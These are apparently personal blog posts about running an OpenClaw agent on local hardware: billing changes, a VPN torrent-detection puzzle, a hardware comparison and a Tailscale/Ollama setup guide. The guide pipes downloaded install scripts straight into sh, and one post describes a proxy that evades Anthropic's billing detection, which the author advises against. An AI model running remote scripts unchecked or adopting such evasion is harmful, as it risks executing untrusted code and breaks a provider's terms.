Prathamesh Shetye

Anthropic Changed the Rules: Revising My OpenClaw Split Deployment for Zero Cloud Spend

2026-04-09T00:00:00+00:00

Five days ago, Anthropic pulled the rug on every OpenClaw user running Claude through a Pro or Max subscription. Starting April 4, 2026, third-party tools like OpenClaw can no longer draw from your subscription quota. If you want Claude in your agent pipeline, you now pay per token through API keys or Anthropic’s new “extra usage” billing — no more flat-rate all-you-can-eat.

This directly impacts the split-deployment architecture I documented last week: a Minisforum UM890 Pro as the hardened always-on gateway, and a gaming PC (7800X3D + RTX 5080) as the GPU-accelerated inference server, connected over Tailscale. That guide assumed Claude Sonnet as the “thinking” model and the fallback when the gaming PC was off. Under the new billing, that assumption could easily cost $300+/month in API charges.

Time to revise the plan. The goal: spend nothing beyond electricity.

What Anthropic Actually Changed

The short version: Claude subscriptions (Pro at $20/month, Max at $200/month) now only cover Anthropic’s own products — claude.ai, Claude Code CLI, Claude Desktop, and Claude Cowork. Third-party tools like OpenClaw, Cursor, and others are cut off from subscription quota entirely.

If you still want to use Claude with OpenClaw, you have two options: a dedicated API key (pay-per-token at $3/$15 per million input/output tokens for Sonnet 4.6), or Anthropic’s new “extra usage” pay-as-you-go add-on. Both are metered. Both can get expensive fast under agentic workloads, because OpenClaw conversations accumulate context — the 10th turn resends all previous turns, and token consumption grows roughly exponentially.

Anthropic’s stated reasoning is that third-party harnesses bypass their prompt cache optimization layer, meaning a heavy OpenClaw session consumes far more infrastructure than an equivalent Claude Code session. Whether you view this as reasonable capacity management or strategic moat-building probably depends on how much your workflow just broke.

For context on scale: testing by the German tech outlet c’t 3003 found that a single day of OpenClaw usage on Claude Opus consumed over $100 in API-equivalent tokens. Even Sonnet-only usage can run $10-20/day once you factor in context accumulation, tool calls, and system prompt overhead. At those rates, a month of moderate usage would dwarf what I spend on electricity for both machines combined.

Claim Your Credit — You Have 8 Days

Before anything else: if you’re on a Claude Pro or Max subscription, Anthropic is offering a one-time credit equal to your monthly subscription price. You must redeem it by April 17, 2026, and it’s valid for 90 days. Go to your Anthropic account settings and claim it now. It’s free money and it expires permanently if you don’t act.

They’re also offering up to 30% off pre-purchased extra usage bundles, which could be worth it if you decide to keep a small Claude budget for emergencies.

The Original Architecture

Here’s the architecture from my previous post:

┌──────────────────────┐       Tailscale (WireGuard)       ┌──────────────────────┐
│   UM890 Pro          │◄─────────────────────────────────► │   Gaming PC          │
│   (Gateway)          │    100.x.x.1 ◄──► 100.x.x.2      │   (Inference)        │
│                      │                                    │                      │
│  OpenClaw Gateway    │   ollama/qwen3.5:27b @ :11434     │  Ollama + CUDA       │
│  Docker (rootless)   │──────────────────────────────────► │  RTX 5080 (16GB)     │
│  Browser automation  │                                    │  Qwen 3.5 27B        │
│  Messaging channels  │   fallback: Claude Sonnet (cloud)  │                      │
│  Netdata monitoring  │                                    │  Netdata monitoring   │
└──────────────────────┘                                    └──────────────────────┘

The model configuration looked like this:

{
  agents: {
    defaults: {
      model: {
        primary: "ollama/qwen3.5:27b",
        thinking: "anthropic/claude-sonnet-4-6-20260514",
        fallbacks: ["anthropic/claude-sonnet-4-6-20260514"]
      }
    }
  }
}

The idea was sound: local model for routine work, Claude for complex reasoning and as a safety net when the gaming PC is off. But under the new billing, every “thinking” invocation and every fallback hit now costs real money. A few complex coding sessions per day could easily burn $5-10, and that adds up to $150-300/month — exactly the kind of bill I built this hardware setup to avoid.

The Revised Plan: Local-Only Inference

The updated architecture eliminates cloud dependency entirely:

┌──────────────────────┐       Tailscale (WireGuard)       ┌──────────────────────┐
│   UM890 Pro          │◄─────────────────────────────────► │   Gaming PC          │
│   (Gateway)          │    100.x.x.1 ◄──► 100.x.x.2      │   (Inference)        │
│                      │                                    │                      │
│  OpenClaw Gateway    │   ollama/qwen3.5:27b @ :11434     │  Ollama + CUDA       │
│  Docker (rootless)   │──────────────────────────────────► │  RTX 5080 (16GB)     │
│  Browser automation  │   ollama/qwen3.5:7b  @ :11434     │  Qwen 3.5 27B + 7B   │
│  Messaging channels  │                                    │                      │
│  Netdata monitoring  │   NO cloud fallback                │  Netdata + nvidia-smi│
└──────────────────────┘                                    └──────────────────────┘

And the revised model configuration:

{
  agents: {
    defaults: {
      model: {
        primary: "ollama/qwen3.5:27b",
        // No thinking model — primary handles everything
        fallbacks: ["ollama/qwen3.5:7b"]
      }
    }
  },
  models: {
    providers: {
      ollama: {
        baseUrl: "http://100.x.x.2:11434",
        apiKey: "ollama-local",
        api: "ollama"  // Native API, NOT /v1 — this is critical for tool calling
      }
    }
  }
}

Key changes:

No Claude anywhere in the model chain. The 27B Qwen model handles all tasks — complex reasoning, coding, multi-step planning. It won’t match Claude Sonnet on the hardest problems, but it’s remarkably capable and the cost per token is exactly $0.
Fallback is a smaller local model, not a cloud API. If the 27B model fails or is slow, the 7B variant picks up. Both run on the same GPU.
Local embeddings for memory search. Setting memorySearch.provider to "local" or "ollama" keeps semantic memory queries on-device instead of hitting OpenAI or Voyage embedding APIs.
QMD (Quick Memory Database) enabled. This is OpenClaw’s local semantic search feature that builds a vector database on-device. It indexes conversation history and documents, then retrieves only relevant context snippets rather than resending the full conversation history to the model. This directly attacks context accumulation — the biggest cost driver in agentic workloads, and even in a local-only setup, it reduces inference time and improves response quality.

Model Routing: Not Every Task Needs 27 Billion Parameters

OpenClaw supports complexity-based model routing, and this is where the two-model local setup pays off. The routing configuration scores tasks by complexity signals — token count, file count, keywords — and dispatches to the appropriate model:

{
  routing: {
    complexity_signals: {
      token_count_threshold: 2000,
      file_count_threshold: 3,
      primary_keywords: ["refactor", "architect", "optimize", "security", "debug"],
      economy_file_patterns: ["*.md", "*.json", "*.yaml", "*.toml", "*.txt"]
    }
  }
}

Heavy reasoning — architecture decisions, complex debugging, multi-file refactoring — goes to the 27B model. Simple tasks — calendar checks, message forwarding, config file edits, documentation lookups — go to the 7B model, which responds faster and frees VRAM for the next heavy request. Both models cost nothing to run beyond electricity.

What About When the Gaming PC Is Off?

This is the real trade-off. The original plan had Claude Sonnet as the graceful degradation path: gaming PC off → agent keeps working through the cloud. Without that fallback, a powered-down gaming PC means the agent stops responding.

My solution: wake-on-demand via Tailscale + Wake-on-LAN. The UM890 gateway detects that the Ollama endpoint is unreachable, sends a WoL magic packet to the gaming PC’s LAN MAC address, and queues incoming requests for 30-60 seconds while the machine boots and loads the model into VRAM. It’s not instant, but it’s functional, and it costs nothing.

For overnight hours when I genuinely don’t need the agent, the gaming PC suspends to save power. The gateway returns a polite “agent is resting, will respond when available” to any messaging channels. Not every AI agent needs to be available 24/7.

The One Exception: Emergency Claude Budget

I’m keeping a Claude API key configured but with a hard $2/day spending cap in the Anthropic console. This exists purely for the scenario where I genuinely need frontier-level reasoning on something time-sensitive and the local model isn’t cutting it. At $2/day, the worst-case monthly overshoot is $60 — but I expect actual usage to be near zero most months.

The configuration keeps Claude available but never automatic:

{
  // Claude is NOT in the fallback chain — it won't trigger automatically
  // Only invocable via explicit /model switch command in a session
  models: {
    providers: {
      anthropic: {
        apiKey: "sk-ant-xxxxx",  // Dedicated key with $2/day cap
        api: "anthropic"
      }
    }
  }
}

This way, Claude never fires without my conscious decision to invoke it. No surprise bills.

A Note on the Billing Proxy Approach

I’ve seen the openclaw-billing-proxy project making the rounds — it’s a 7-layer proxy that rewrites OpenClaw requests to look like Claude Code requests, injecting billing headers and renaming tool schemas to bypass Anthropic’s detection. It works today. It will almost certainly break tomorrow.

I’d strongly recommend against this path. It explicitly circumvents Anthropic’s billing enforcement, requires constant maintenance as detection layers evolve (it’s already on v2.0 with 30+ pattern bypasses), and risks account termination. Anthropic has shown they’re willing to enforce aggressively here, and building your workflow on a cat-and-mouse evasion game is not a stable foundation.

The right answer is either to pay for what you use, or to not use it. I’m choosing the latter for routine work.

Implementation Status

I have Ubuntu Server 24.04 LTS installed on the UM890 Pro. The gaming PC still needs its Ubuntu install. Here’s the phased execution plan:

Phase 1 — UM890 Pro Base Hardening (today)

Post-install security baseline: UFW, SSH key-only auth, fail2ban
Unattended security updates
Dedicated openclaw user with no sudo
Tailscale installation and authentication

Phase 2 — Gaming PC Setup

Ubuntu Server 24.04 LTS install
Nvidia driver installation and verification (nvidia-smi)
Ollama install, pull both Qwen 3.5 27B and 7B models
Bind Ollama to Tailscale interface only
UFW restricting port 11434 to tailscale0

Phase 3 — Gateway Configuration

Rootless Docker for the openclaw user
Node.js 24 via nvm
OpenClaw install and onboarding with Ollama
Revised model configuration (local-only with routing)
QMD and local embeddings enabled
Gateway bound to loopback, agent sandboxing enabled

Phase 4 — Monitoring & Power Management

Netdata on both machines (with GPU monitoring on the gaming PC)
Wake-on-LAN configuration for demand-based power management
Suspend/wake scripts integrated with the gateway

Phase 5 — Validation

End-to-end inference testing through messaging channels
WoL wake-from-suspend testing
One-week cost audit via /usage full
openclaw doctor and openclaw security audit --deep

Revised Cost Analysis

Component	Monthly Estimate
UM890 Pro electricity (24/7, ~15W idle)	~$3
Gaming PC electricity (12hr/day, ~120W avg)	~$16
Anthropic API (emergency manual-only)	$0–2
Total	~$19–21/month

Compare this to:

Original plan (pre-April 4): ~$24–34/month with regular Claude fallback on subscription
Post-April 4 with old config: Potentially $150–300+/month on metered API billing
Pure cloud OpenClaw: $300–600/month at moderate usage levels

The hardware pays for itself even faster now.

The Bigger Picture

Anthropic’s move isn’t surprising in hindsight. Flat-rate subscriptions and autonomous agents with unbounded token consumption were never going to coexist sustainably. The real question is whether this pushes the ecosystem toward better local models faster — and based on how capable Qwen 3.5 27B already is on a single RTX 5080, I think the answer is yes.

The split-deployment architecture I designed actually becomes more justified under the new billing. The whole point was to minimize cloud dependency and keep the critical path on hardware I own. Anthropic just made that decision even more economical by making the alternative dramatically more expensive.

I’ll follow up with detailed implementation posts as I work through each phase. If you’re in the same boat — an OpenClaw user suddenly staring at metered billing — the TL;DR is: invest in local inference hardware, configure aggressive model routing, and treat cloud APIs as an emergency escape hatch rather than a default.

The models are good enough. The hardware is affordable enough. And now, the incentive alignment is clear enough.

Your VPN Isn’t as Invisible as You Think: How My Router Knew I Was Torrenting

2026-04-01T00:00:00+00:00

I’d been curious about how VPN-tunneled Docker setups actually work in practice — the kind where you route containers through a VPN gateway so all their traffic is encrypted. Every guide tells you the same thing: use network_mode: service: and all traffic is encrypted, invisible to your local network, end of story.

So I set up a simple experiment: ExpressVPN, qBittorrent, and a Firefox container, all wired together with Docker Compose. I grabbed a few Linux ISOs to generate some real BitTorrent traffic and see how the tunnel behaved.

Then my Unifi Dream Machine flagged BitTorrent traffic on my network.

The Setup

The setup runs on TrueNAS SCALE. The architecture is simple and follows the widely recommended pattern: a single ExpressVPN container acts as the network gateway, and the other containers ride on its network stack.

Here’s the relevant structure (sensitive values redacted):

services:
  expressvpn:
    cap_add:
      - NET_ADMIN
    container_name: expressvpn
    devices:
      - /dev/net/tun
    environment:
      - CODE=
      - SERVER=ireland
      - PROTOCOL=lightwayudp
      - ALLOW_LAN=true
      - LAN_CIDR=192.168.0.0/23
    image: misioslav/expressvpn:latest
    ports:
      - '30024:30024'
      - '51413:51413'
      - 51413:51413/udp
    privileged: true
    restart: unless-stopped

  qbittorrent:
    container_name: qbittorrent
    depends_on:
      expressvpn:
        condition: service_healthy
    environment:
      - WEBUI_PORT=30024
      - TORRENTING_PORT=51413
    image: linuxserver/qbittorrent
    network_mode: service:expressvpn
    restart: unless-stopped
    volumes:
      - /mnt/fast-pool/appdata/qbittorrent:/config
      - /mnt/fast-pool/Downloads:/downloads

  firefox:
    container_name: firefox
    depends_on:
      expressvpn:
        condition: service_healthy
    image: lscr.io/linuxserver/firefox:latest
    network_mode: service:expressvpn
    restart: unless-stopped

The key line is network_mode: service:expressvpn. This forces qBittorrent and Firefox to share the VPN container’s network namespace. They have no independent network interface. All their packets go through the VPN tunnel. The port mappings live on the VPN container because it owns the network stack.

This is correct. This is what everyone recommends. And it works — the actual torrent data is going through the VPN.

So what went wrong?

The Suspects

When I saw the Unifi DPI alert, I worked through four possible explanations.

1. DNS Leaks

If DNS queries escape the VPN tunnel and hit your local router, your Unifi gateway sees you resolving tracker domains like tracker.opentrackr.org. The file transfers are encrypted, but the DNS lookups give the game away.

This is a common issue. Whether the VPN container handles DNS internally or falls back to the host’s resolver depends entirely on the image’s implementation. If DNS requests are reaching your Unifi gateway, its DPI engine will happily log them.

2. Traffic Pattern Analysis (DPI Fingerprinting)

Modern DPI doesn’t just read packet contents — it recognizes behavioral patterns. BitTorrent has a distinctive fingerprint even when encrypted: many simultaneous connections to diverse IPs, specific port usage patterns, and characteristic upload/download ratios. Encrypted traffic isn’t invisible traffic; it just can’t be read. Its shape is still visible.

That said, VPN traffic should collapse all of this into a single encrypted stream to one IP (the VPN server). If the tunnel is working, the pattern analysis shouldn’t have enough signal to work with.

3. Leaked Packets During VPN Reconnection

If ExpressVPN drops and reconnects (even briefly), packets can escape unencrypted before the tunnel comes back up. A few seconds of leaked BitTorrent protocol handshakes are enough for DPI to flag it. This is the classic kill-switch problem.

4. The Split Tunnel — The Actual Culprit

Look at this line in the VPN container config:

ALLOW_LAN=true
LAN_CIDR=192.168.0.0/23

This creates a split tunnel. Traffic destined for the local network (192.168.0.0/23) bypasses the VPN entirely and flows directly over the LAN. This is intentional — it’s how you access the qBittorrent WebUI from another machine on your network by hitting http://:30024.

And that’s the problem.

When I open the qBittorrent WebUI from my laptop, the request goes from my laptop to the server over the LAN, unencrypted, and the response comes back the same way. The Unifi gateway sits in the middle of that path. It inspects the traffic, sees qBittorrent’s WebUI protocol and HTTP headers, and flags it as BitTorrent.

The actual peer-to-peer torrent data is going through the VPN. Unifi never sees the file transfers. But it sees the management interface and that’s enough to trigger the DPI classification.

The Distinction That Matters

This is an important nuance that most guides gloss over: there’s a difference between your torrent data being visible and your torrent client being visible.

The split tunnel protects the former but exposes the latter. Your ISP can’t see what you’re downloading. But your local router knows you’re running qBittorrent because you’re accessing its WebUI over the LAN.

For most home users, this is perfectly fine — your router is your own hardware. But if you want to be thorough, or if you’re on a network you don’t fully control, it’s worth understanding.

Mitigations

If the DPI detection bothers you, there are a few options:

Access the WebUI through the VPN, not the LAN. If you’re already running something like Tailscale or Twingate on your network, access the qBittorrent WebUI through that tunnel instead of over the local network. The traffic stays encrypted end-to-end and the Unifi gateway never sees it.

Check for DNS leaks. Exec into the VPN container and verify DNS is resolving through the tunnel:

docker exec -it expressvpn bash
cat /etc/resolv.conf
nslookup example.com

If the nameserver is your local router’s IP, DNS is leaking.

Drop privileged: true. The container only needs cap_add: NET_ADMIN and the /dev/net/tun device. Running in privileged mode gives the container full access to the host’s network interfaces, which is unnecessary and widens the attack surface.

Disable DPI on Unifi. If you own the network and don’t care about the classification, you can just turn off Deep Packet Inspection in your Unifi controller. But understanding why it triggers is more valuable than silencing it.

Takeaway

The Docker network_mode: service: pattern works. Your torrent traffic is going through the VPN. But if you enable LAN access for convenience (and most people do), your router can still identify what services you’re running from the unencrypted management traffic. The VPN hides what you’re transferring — it doesn’t hide what you’re running.

Understanding the difference between data privacy and service visibility is what separates a working setup from one you actually understand.

OpenClaw Hardware Showdown: Mini PC vs. Gaming Rig — When a Discrete GPU Changes the Equation

2026-03-31T00:00:00+00:00

In my previous post, I made the case for the Minisforum UM890 Pro as a dedicated, hardened OpenClaw appliance — comparing it against the Mac Mini M4 and concluding that native Linux containers, 32GB of DDR5, and 4TB of NVMe runway made it the better fit for autonomous agent workloads. That analysis assumed a choice between two compact, low-power machines.

But I have another machine sitting idle. A full-tower gaming PC — AMD Ryzen 7 7800X3D, 64GB DDR5, 4TB NVMe PCIe 4.0, and an Nvidia GeForce RTX 5080 — that isn’t part of my daily workflow. Neither machine is my daily driver. Both are “extra.” So the natural question is: does a discrete GPU with 16GB of VRAM and CUDA acceleration fundamentally change the OpenClaw hardware calculus?

The short answer: yes, dramatically — but not in the way you might expect.

The Contenders: Specifications Compared

Specification	Minisforum UM890 Pro	Gaming PC	Implications for OpenClaw
CPU	AMD Ryzen 9 8945HS (8C/16T, Zen 4, up to 5.2GHz)	AMD Ryzen 7 7800X3D (8C/16T, Zen 4 + 3D V-Cache, up to 5.0GHz)	Both are 8-core Zen 4. The 7800X3D’s 96MB of 3D V-Cache is a gaming advantage but provides negligible benefit for agent orchestration or LLM inference. The 8945HS’s slightly higher boost clock is irrelevant in practice — neither CPU will be the bottleneck.
GPU	AMD Radeon 780M (integrated, RDNA 3)	Nvidia GeForce RTX 5080 (16GB GDDR7, 10,752 CUDA cores, Blackwell)	This is the defining difference. The RTX 5080 enables CUDA-accelerated local LLM inference via Ollama/llama.cpp at speeds that make local models genuinely usable. The 780M iGPU cannot run anything beyond toy-sized models at acceptable token rates.
RAM	32GB DDR5 5600MT/s	64GB DDR5 5200MT/s	64GB provides substantial headroom for simultaneous local LLM inference + OpenClaw gateway + browser automation + monitoring stack.
VRAM	Shared from system RAM	16GB GDDR7 (dedicated)	16GB of dedicated VRAM comfortably hosts quantized 7B–14B parameter models entirely on-GPU. No system RAM competition, no unified memory contention.
Storage	4TB NVMe PCIe 4.0	4TB NVMe PCIe 4.0	Parity. Both provide ample runway for model weights, workspace logs, skill caches, and memory databases.
NPU	AMD XDNA (~16 TOPS)	None	The UM890 Pro’s NPU is accessible via open-source ML frameworks but delivers marginal throughput compared to a discrete GPU with 10,752 CUDA cores.
Expansion	OCuLink (PCIe 4.0 x4)	Full PCIe 5.0 x16 slot (occupied by RTX 5080)	The gaming PC already has the discrete GPU installed. The UM890 Pro’s OCuLink port could theoretically connect an eGPU, but that adds cost and complexity.
Power Draw	~60–70W (full system)	~500W+ under load (105W CPU TDP + 360W GPU TDP + system overhead)	The gaming PC draws roughly 7–8x the power of the UM890 Pro. At California electricity rates, this adds up fast for a 24/7 appliance.
Noise	Near-silent at idle	Multiple case fans + GPU cooler	The gaming PC is not a quiet machine. It is not something you want humming in a closet or on a desk 24/7.
Form Factor	~0.5L mini PC, VESA mountable	Full tower desktop	The UM890 Pro disappears behind a monitor. The gaming PC occupies serious desk or floor real estate.

Where the GPU Changes Everything: Local LLM Inference

In my previous post, I treated OpenClaw primarily as a cloud-API orchestration layer — the gateway talks to Anthropic’s Claude or OpenAI’s GPT, and the local hardware just needs to keep the Node.js process, Docker containers, and browser automation running smoothly. For that workload, the UM890 Pro is more than sufficient.

But the OpenClaw ecosystem has matured rapidly. Ollama became an official OpenClaw provider in March 2026, and the Qwen 3.5 model family has shifted the cost-benefit analysis of local inference. Running a capable local model means:

Zero per-token API costs for routine tasks (file reads, simple edits, boilerplate generation).
Complete data privacy — nothing leaves your machine.
No network dependency — the agent works even if your internet drops.
Hybrid routing — use local models for the cheap stuff, cloud APIs for hard reasoning.

What Can Each Machine Actually Run Locally?

This is where the RTX 5080’s 16GB of GDDR7 VRAM becomes decisive.

Model	Size (Q4_K_M)	UM890 Pro (CPU inference via 780M/system RAM)	Gaming PC (CUDA inference via RTX 5080)
Qwen 3.5 9B	~5GB	~8–12 tok/s (CPU-bound, painful)	~80–100+ tok/s (fully GPU-offloaded)
Qwen 3.5 27B	~16GB	Barely feasible, ~2–4 tok/s with heavy swapping	~30–40 tok/s (fits entirely in 16GB VRAM)
Qwen 3.5 35B-A3B (MoE)	~20GB	Not practical	~50–70 tok/s (only 3B params active per pass, fits in VRAM)
Llama 3.3 70B	~40GB	Impossible	Partial offload — ~10–15 tok/s (spills to system RAM)

The UM890 Pro can technically run a 7B–9B model via CPU inference, but the token generation speed makes it impractical for interactive agent work. You’re looking at multi-second delays per response, which compounds painfully when the agent is chaining tool calls.

The gaming PC with the RTX 5080 runs the Qwen 3.5 27B — a model that scores comparably to GPT-4-class outputs on coding benchmarks — entirely in VRAM at usable interactive speeds. This is the single biggest differentiator.

The Hybrid Model: Where Cost Savings Get Real

The OpenClaw community has converged on a hybrid inference pattern that the gaming PC enables beautifully:

{
  "agents": {
    "defaults": {
      "model": {
        "primary": "ollama/qwen3.5:27b",
        "thinking": "anthropic/claude-sonnet-4-6-20260514"
      }
    }
  }
}

The local Qwen 3.5 27B handles file reads, simple edits, boilerplate generation, and routine tool calls — roughly 60–70% of a typical agent session. Claude Sonnet handles the hard reasoning, multi-file architecture decisions, and complex debugging. Community reports suggest this hybrid approach drops daily API spend from $20–50 down to a few dollars.

On the UM890 Pro, this hybrid pattern is technically possible with a 9B model as the local tier, but the quality gap between 9B and 27B is significant enough that you end up routing far more tasks to the cloud API, negating much of the cost benefit.

Where the UM890 Pro Still Wins

The GPU advantage is real, but it doesn’t make the UM890 Pro irrelevant. Several factors still favor the mini PC.

Power Consumption and 24/7 Viability

OpenClaw’s core value proposition is an always-on agent. It checks your email overnight, monitors projects, sends reminders, and handles asynchronous workflows. This means the host machine runs 24/7/365.

Running the numbers for California electricity rates (~$0.30/kWh):

Machine	Estimated Idle Draw	Estimated Active Draw	Monthly Cost (24/7 idle)	Monthly Cost (24/7 active)
UM890 Pro	~15W	~60W	~$3.24	~$12.96
Gaming PC	~80W	~350W+	~$17.28	~$75.60

Over a year, the gaming PC costs roughly $170–$900 more in electricity depending on utilization. That’s real money — potentially more than the API costs the local LLM inference is saving you.

Noise and Physical Footprint

The UM890 Pro is near-silent at idle and can be VESA-mounted behind a monitor. It disappears. The gaming PC has multiple case fans, a CPU cooler, and a GPU with a substantial cooling solution. Even at idle, it produces audible noise. For a 24/7 appliance that might live in a home office or closet, this matters.

Native Linux Security Model

Both machines can run Ubuntu Server 24.04 LTS, so the hardened deployment architecture from my previous post — rootless Docker, --cap-drop=ALL, dedicated openclaw user, Tailscale-only remote access — applies equally to both. No advantage either way here.

Simplicity and Reliability

The UM890 Pro has no discrete GPU driver stack to maintain. No CUDA toolkit updates. No GPU firmware issues. Fewer moving parts (literally — smaller fans, lower thermal load) means fewer failure modes for a long-running appliance. The gaming PC’s RTX 5080 adds Nvidia driver management, CUDA version compatibility with Ollama/llama.cpp, and potential thermal throttling concerns in an enclosed space.

The Verdict: It Depends on Your Inference Strategy

This isn’t a simple “Machine A is better” conclusion. The right choice depends entirely on how you plan to use OpenClaw’s inference pipeline.

Choose the Gaming PC (7800X3D + RTX 5080) if:

You want to run local LLM inference as a primary or hybrid model provider.
You’re serious about data privacy — nothing leaving your network, ever.
You want to experiment with larger models (27B–35B parameter range) at interactive speeds.
You’re comfortable managing the Nvidia driver and CUDA stack on Linux.
The machine will be in a location where noise and power draw are acceptable (garage, dedicated server closet, basement).
You value reducing ongoing API costs over minimizing electricity costs.

Choose the UM890 Pro if:

You’re running OpenClaw primarily as a cloud-API orchestration gateway (Claude, GPT-4, etc.).
Always-on, silent, low-power operation is a priority — the agent runs in your home office or living space.
You want an appliance-like deployment with minimal maintenance overhead.
You prefer to keep things simple — no GPU drivers, no CUDA, no thermal management concerns.
Electricity cost is a meaningful factor in your decision.

My Plan: Why Not Both?

Here’s what I’m actually going to do. The gaming PC becomes the local inference server — running Ollama with the Qwen 3.5 27B model, exposed only on the Tailscale network at a fixed IP. The UM890 Pro remains the hardened OpenClaw gateway appliance — running the agent, Docker sandbox, browser automation, and all messaging channel integrations.

The OpenClaw config on the UM890 Pro points to the gaming PC’s Ollama endpoint for local inference and falls back to Claude Sonnet for complex tasks:

{
  "agents": {
    "defaults": {
      "model": {
        "primary": "ollama/qwen3.5:27b",
        "thinking": "anthropic/claude-sonnet-4-6-20260514"
      },
      "providers": {
        "ollama": {
          "baseUrl": "http://100.x.x.x:11434"
        }
      }
    }
  }
}

This gives me the best of both worlds:

The UM890 Pro handles the security-critical gateway role — minimal attack surface, native Linux containers, low power, silent, always-on.
The Gaming PC handles the compute-heavy inference role — 16GB of VRAM running a 27B model at interactive speeds, and it can be powered down when not needed to save electricity.
Tailscale ties them together securely — no ports exposed to the internet, WireGuard encryption in transit, and both machines are already on my Tailscale network.

The separation of concerns also means if the inference server goes down (GPU driver update, thermal issue, power outage), the OpenClaw gateway on the UM890 Pro gracefully falls back to cloud APIs. The agent never stops working.

Final Thoughts

The original question — “which machine is better for OpenClaw?” — turns out to be the wrong question. The right question is: what role does each machine play in a well-architected agent deployment?

A discrete GPU with 16GB of VRAM is a genuine game-changer for local LLM inference. It transforms OpenClaw from a cloud-API relay into a hybrid system where the majority of inference happens locally, privately, and at zero marginal cost. But the GPU doesn’t make the machine a better gateway. The gateway role — always-on, secure, reliable, low-power — is still better served by the compact, silent, efficient mini PC.

If you only have one machine and you want local inference, the gaming PC wins decisively. If you only have one machine and you’re happy with cloud APIs, the UM890 Pro wins on efficiency, noise, and simplicity. If you have both, split the roles and let each machine do what it’s best at.

The lobster doesn’t care which shell it lives in. But it helps to give it the right one for each claw.

Building a Split-Brain OpenClaw Deployment: Gateway + Inference Server Over Tailscale

2026-03-31T00:00:00+00:00

In my previous post, I compared the Minisforum UM890 Pro against a gaming PC (7800X3D + RTX 5080) for running OpenClaw, and concluded that the best approach is to split the roles: the UM890 Pro as the hardened always-on gateway, and the gaming PC as the GPU-accelerated inference server. This post is the full implementation guide — step-by-step, command-by-command — for anyone who wants to replicate this architecture across two Linux machines connected over Tailscale.

Architecture Overview

The design has two machines with distinct roles, connected over a Tailscale WireGuard mesh:

Machine A — UM890 Pro (Gateway Appliance)

Runs Ubuntu Server 24.04 LTS
Hosts the OpenClaw gateway process inside a hardened Docker container
Handles all messaging channels (WhatsApp, Telegram, Discord, etc.)
Runs browser automation, cron jobs, and skill execution
Points to Machine B for local LLM inference
Falls back to cloud APIs (Claude Sonnet) when Machine B is unavailable
Always-on, low power (~15W idle), near-silent

Machine B — Gaming PC (Inference Server)

Runs Ubuntu Server 24.04 LTS
Hosts Ollama with Nvidia CUDA acceleration (RTX 5080, 16GB VRAM)
Serves Qwen 3.5 27B (Q4_K_M quantization) over the native Ollama API
Listens only on the Tailscale interface — not exposed to LAN or internet
Can be powered down when not needed; the gateway degrades gracefully to cloud APIs

Network Glue — Tailscale

Both machines join the same Tailscale tailnet
All traffic between them is end-to-end encrypted via WireGuard
No port forwarding, no public IP exposure
Tailscale ACLs restrict which devices can reach the Ollama port

┌──────────────────────┐       Tailscale (WireGuard)       ┌──────────────────────┐
│   UM890 Pro          │◄─────────────────────────────────► │   Gaming PC          │
│   (Gateway)          │    100.x.x.1 ◄──► 100.x.x.2      │   (Inference)        │
│                      │                                    │                      │
│  OpenClaw Gateway    │   ollama/qwen3.5:27b @ :11434     │  Ollama + CUDA       │
│  Docker (rootless)   │──────────────────────────────────► │  RTX 5080 (16GB)     │
│  Browser automation  │                                    │  Qwen 3.5 27B        │
│  Messaging channels  │   fallback: Claude Sonnet (cloud)  │                      │
│  Netdata monitoring  │                                    │  Netdata monitoring   │
└──────────────────────┘                                    └──────────────────────┘

Phase 1: Base OS Installation (Both Machines)

Both machines get a clean Ubuntu Server 24.04 LTS minimal install. No desktop environment — this is headless server territory.

1.1 Install Ubuntu Server 24.04 LTS

Flash the Ubuntu Server 24.04 LTS ISO to a USB drive and install on both machines. During installation:

Choose minimal server install (no snaps, no desktop)
Create a non-root user (e.g., prathamesh)
Enable OpenSSH server during install
Use the full 4TB NVMe as a single ext4 partition (or LVM if you prefer flexibility)

1.2 Post-Install Baseline (Both Machines)

After first boot, SSH in and run:

# Update system packages
sudo apt update && sudo apt upgrade -y

# Install essential tools
sudo apt install -y curl wget git htop tmux ufw net-tools

# Set timezone
sudo timedatectl set-timezone America/Los_Angeles

# Enable automatic security updates
sudo apt install -y unattended-upgrades
sudo dpkg-reconfigure -plow unattended-upgrades

1.3 Configure UFW Firewall (Both Machines)

# Default deny inbound, allow outbound
sudo ufw default deny incoming
sudo ufw default allow outgoing

# Allow SSH
sudo ufw allow ssh

# Enable the firewall
sudo ufw enable
sudo ufw status verbose

We will add Tailscale-specific rules later.

1.4 Install Tailscale (Both Machines)

# Install Tailscale
curl -fsSL https://tailscale.com/install.sh | sh

# Bring Tailscale up and authenticate
sudo tailscale up

# Note the Tailscale IP for each machine
tailscale ip -4

After running tailscale up on both machines and authenticating with the same Tailscale account, note the Tailscale IPs. For the rest of this guide, I’ll use:

UM890 Pro (Gateway): 100.x.x.1
Gaming PC (Inference): 100.x.x.2

Replace these with your actual Tailscale IPs.

1.5 Verify Connectivity

From the UM890 Pro:

ping 100.x.x.2  # Should succeed

From the Gaming PC:

ping 100.x.x.1  # Should succeed

Phase 2: Gaming PC — Inference Server Setup

This is where the RTX 5080 earns its keep.

2.1 Install Nvidia Drivers

# Check that the GPU is visible on the PCI bus
lspci | grep -i nvidia

# Install the recommended driver automatically
sudo ubuntu-drivers autoinstall

# Reboot
sudo reboot

After reboot, verify:

nvidia-smi

You should see the RTX 5080 listed with the driver version and CUDA version. If nvidia-smi fails, troubleshoot before proceeding — Ollama will silently fall back to CPU inference without working drivers, and you’ll get 3 tok/s instead of 40.

2.2 Install Ollama

curl -fsSL https://ollama.com/install.sh | sh

Verify it’s running:

systemctl status ollama
ollama --version

2.3 Pull the Qwen 3.5 27B Model

ollama pull qwen3.5:27b

This downloads the Q4_K_M quantized version (~16GB). It will fit entirely in the RTX 5080’s 16GB VRAM. The download may take a while depending on your internet connection.

Verify it’s available:

ollama list

2.4 Test Local Inference

ollama run qwen3.5:27b "Hello, what model are you?"

While this runs, open another terminal and check GPU utilization:

nvidia-smi

You should see VRAM usage spike as the model loads. If VRAM stays at 0 and CPU is pegged, the Nvidia drivers aren’t being detected — go back to step 2.1.

2.5 Bind Ollama to the Tailscale Interface

By default, Ollama only listens on 127.0.0.1:11434. We need it to listen on the Tailscale interface so the UM890 Pro can reach it. The most secure approach is to bind specifically to the Tailscale IP rather than 0.0.0.0.

Create a systemd override:

sudo systemctl edit ollama

This opens an editor. Add the following in the override block:

[Service]
Environment="OLLAMA_HOST=100.x.x.2:11434"

Replace 100.x.x.2 with the gaming PC’s actual Tailscale IP. Save and exit, then reload:

sudo systemctl daemon-reload
